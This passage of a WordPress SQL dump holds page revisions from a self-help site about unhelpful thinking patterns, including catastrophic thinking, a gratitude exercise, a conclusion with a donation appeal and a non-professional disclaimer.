is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore_move_on_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude_tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-05-30 18:42:52', '2023-05-30 18:42:52', '', 1661, 'https://www.happythinking.com/?p=1666', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1667, 1, '2023-05-30 18:45:20', '2023-05-30 18:45:20', '<!-- wp:paragraph -->\n<p>So, my friends, you have come to the end of this website and I hope you found it interesting and useful. However, in reality, this is not truly the end! Let me explain.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For many years, I planned to make this website about happy thinking. It had been a dream of mine for a long while. Unfortunately, all these years, the website only existed in my head. The reason for this is actually that I suffered from the unhelpful thinking pattern of trying to be a perfectionist. Perfectionism made me fear failure, making me not even start this website. Then one day it dawned on me that actually if I did not overcome the unhelpful thinking pattern of trying to be perfect, this website would never ever materialise. I, therefore, forced myself to get in front of my keyboard and started writing, without worrying about the outcome. Luckily things started flowing, and what you read is the version so far. I hope you liked it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, I am determined to further work on this website in the coming months. I plan to add more unhelpful thinking patterns and also more tools. I also plan to improve the material already present. To make the content easier and fun to read, I will be adding plenty of diagrams as well.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Eventually, I will add a dedicated section containing loads of short examples demonstrating the various tools. I believe examples will go a long way in making things clearer. Finally, I also plan to add bits of wisdom from various sources, to help you along your journey to happiness. In essence, there will be lots more material&nbsp; and what I am saying is, â€œPlease visit this website again!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I do this website completely on my own using my own funds. If you are able to, I would be very grateful if you would consider donating the equivalent of one dollar to help with the running costs. To do so, you can go to the donate page by clicking <a href="https://www.happythinking.com/donate/">HERE</a>. I am short of funds so every little bit will help.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I wish you bye for now. I sincerely hope to see you again soon. Happy Thinking!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'publish', 'closed', 'closed', '', 'conclusion', '', '', '2023-08-09 18:42:36', '2023-08-09 18:42:36', '', 0, 'https://www.happythinking.com/?page_id=1667', 0, 'page', '', 0),
(1761, 1, '2023-06-06 19:15:45', '2023-06-06 19:15:45', '<!-- wp:paragraph -->\n<p>So, my friends, you have come to the end of this website and I hope you found it interesting and useful. However, in reality, this is not truly the end! Let me explain.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For many years, I planned to make this website about happy thinking. It had been a dream of mine for a long while. Unfortunately, all these years, the website only existed in my head. The reason for this is actually that I suffered from the negative thinking pattern of trying to be a perfectionist. Perfectionism made me fear failure, making me not even start this website. Then one day it dawned on me that actually if I did not overcome the negative thinking pattern of trying to be perfect, this website would never ever materialise. I, therefore, forced myself to get in front of my keyboard and started writing, without worrying about the outcome. Luckily things started flowing, and what you read is the version so far. I hope you liked it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, I am determined to further work on this website in the coming months. I plan to add more negative thinking patterns and also more tools. I also plan to improve the material already present. To make the content easier and fun to read, I will be adding plenty of diagrams as well. Eventually, I will add a dedicated section containing loads of short examples demonstrating the various tools. I believe examples will go a long way in making things clearer. Finally, I also plan to add bits of wisdom from various sources, to help you along your journey to happiness. In essence, there will be lots more material&nbsp; and what I am saying is, â€œPlease visit this website again!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I do this website completely on my own using my own funds. If you are able to, I would be very grateful if you would consider donating the equivalent of one dollar to help with the running costs. To do so, you can go to the donate page by clicking the â€œdonateâ€ tab at the top.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I wish you bye for now.&nbsp; I sincerely hope to see you again soon. Happy Thinking!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-06-06 19:15:45', '2023-06-06 19:15:45', '', 1667, 'https://www.happythinking.com/?p=1761', 0, 'revision', '', 0),
(1671, 1, '2023-05-30 18:47:52', '2023-05-30 18:47:52', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-05-30 18:47:52', '2023-05-30 18:47:52', '', 1667, 'https://www.happythinking.com/?p=1671', 0, 'revision', '', 0),
(1668, 1, '2023-05-30 18:45:20', '2023-05-30 18:45:20', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-05-30 18:45:20', '2023-05-30 18:45:20', '', 1667, 'https://www.happythinking.com/?p=1668', 0, 'revision', '', 0),
(1669, 1, '2023-05-30 18:46:00', '2023-05-30 18:46:00', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negatives. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ how to look for things to be grateful for. One can instead, try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another approach can be to just make it a habit at an easy-to-remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other_possibilities_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/conclusion/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'inherit', 'closed', 'closed', '', '1664-revision-v1', '', '', '2023-05-30 18:46:00', '2023-05-30 18:46:00', '', 1664, 'https://www.happythinking.com/?p=1669', 0, 'revision', '', 0),
(1672, 1, '2023-05-30 18:49:29', '2023-05-30 18:49:29', '<!-- wp:paragraph -->\n<p>The author of this website (www.stopstupidthinking.com) is NOT a professional mental health specialist and the information is provided in good faith. Please read and understand this disclaimer and terms of use before browsing this website. Essentially this website does not contain professional medical advice, so use the information at your own risk. Continued after image below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The content of this website is for informational purposes only. Nothing found on this website is intended to be a substitute for professional psychological, psychiatric or medical advice, diagnosis or treatment. This website accepts no responsibility for the results of any actions taken on the basis of information on this website, nor for the accuracy or completeness of any material contained herein. This website expressly disclaims all and any liability and responsibility to any person in respect of the consequences of anything done or omitted to be done by such person in reliance, whether wholly or partially, upon this website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Always seek the advice of your physician or other qualified mental health provider with any questions you may have regarding a medical condition or mental disorder. Never disregard professional medical advice or delay in seeking it because of something you have read on this website. If you think you may have a medical emergency (including a mental health emergency), call your doctor or emergency services immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reliance on any information provided by this website or by any person or professional appearing on this website is solely at your own risk. this website is not liable for any advice or information provided. No warranties, either expressed or implied, are made on the information provided.<br>This website reserves the right to alter, amend, vary or otherwise change any information on this website at any time and without notice to you. The provision of any URL, link, and recommended reading material is done for the convenience of users of this internet site. It does not constitute an endorsement by this website of the information provided.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you find material on this website offensive, you may choose not to use the website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By reading this and/or by browsing this website, you have agreed to this disclaimer, as well as the websiteâ€™s terms and conditions of use. If you do not agree to this disclaimer or the terms and conditions of use, you should cease your use of this website immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thank you very much for reading the above disclaimer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">HOME</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Disclaimer', '', 'inherit', 'closed', 'closed', '', '451-revision-v1', '', '', '2023-05-30 18:49:29', '2023-05-30 18:49:29', '', 451, 'https://www.happythinking.com/?p=1672', 0, 'revision', '', 0),
(1691, 1, '2023-06-01 05:00:18', '2023-06-01 05:00:18', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-01 05:00:18', '2023-06-01 05:00:18', '', 88, 'https://www.happythinking.com/?p=1691', 0, 'revision', '', 0),
(1674, 1, '2023-05-30 18:54:21', '2023-05-30 18:54:21', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1584,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/green_angel300523.jpg" alt="" class="wp-image-1584"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 18:54:21', '2023-05-30 18:54:21', '', 88, 'https://www.happythinking.com/?p=1674', 0, 'revision', '', 0),
(1675, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1675', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1675', 14, 'nav_menu_item', '', 0),
(1676, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1676', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1676', 6, 'nav_menu_item', '', 0),
(1677, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1677', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1677', 5, 'nav_menu_item', '', 0),
